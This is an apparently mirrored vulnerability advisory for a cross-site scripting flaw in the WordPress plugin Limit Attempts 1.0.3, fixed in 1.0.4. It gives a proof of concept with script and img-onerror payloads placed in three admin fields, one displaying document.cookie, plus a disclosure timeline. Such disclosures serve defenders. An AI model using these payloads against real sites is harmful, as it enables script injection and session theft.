WordPress Limit Attempts 1.0.3 Cross Site Scripting

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1040681 漏洞类型
发布时间 2015-12-18 更新时间 2015-12-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2015120202
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Plugin Name : Limit Attempts
 
Effected Version : 1.0.3 (and most probably lower version's if any)
 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Madhu Akula
 

 
Technical Details
 
Minimum Level of Access Required : Administrator
 
PoC - (Proof of Concept) :
 
The following fields put the payload as below
 
http://localhost/wp-admin/admin.php?page=limit-attempts.php&tab=blacklist
 
lmtttmpts_add_to_blacklist = ?><script>alert(1)</script>
 
http://localhost/wp-admin/admin.php?page=limit-attempts.php&tab=whitelist
 
lmtttmpts_add_to_whitelist = ?><script>alert(1)</script>
 
http://localhost/wp-admin/admin.php?page=limit-attempts.php&tab=go_pro
 
bws_license_key = ?><img src=x onerror=prompt(document.cookie);>
 
 
Vulnerable Parameter : lmtttmpts_add_to_blacklist, lmtttmpts_add_to_whitelist, bws_license_key
 
 
Type of XSS : Reflected / Stored
 
Fixed in : 1.0.4
 
http://wordpress.org/plugins/limit-attempts/changelog/
 
Disclosure Timeline
 
Vendor Contacted : 2014-08-04
 
Plugin Status : Updated on 2014-08-07
 
Public Disclosure : October 3, 2015
 
CVE Number : Not assigned yet
 
Plugin Description :
 
Limit Attempts is a plugin developed by BestWebSoft, which was designed to manage the access to user's website. With this plugin, you can limit user's attempts to log in to your website and, consequently, block the user for a certain period of time. Apart from that, Limit Attempts allows users to create and edit black- and whitelists with the aim of controlling the access to the site and its content. Also, with this plugin, users will be able to specify the settings for adding an address to the blacklist, as well as be aware of everything that is going on your website by sending email notifications about blocking. Moreover, this plugin is compatible with htaccess, thus, you can minimize server workload by adding IP address blocking data to htaccess file.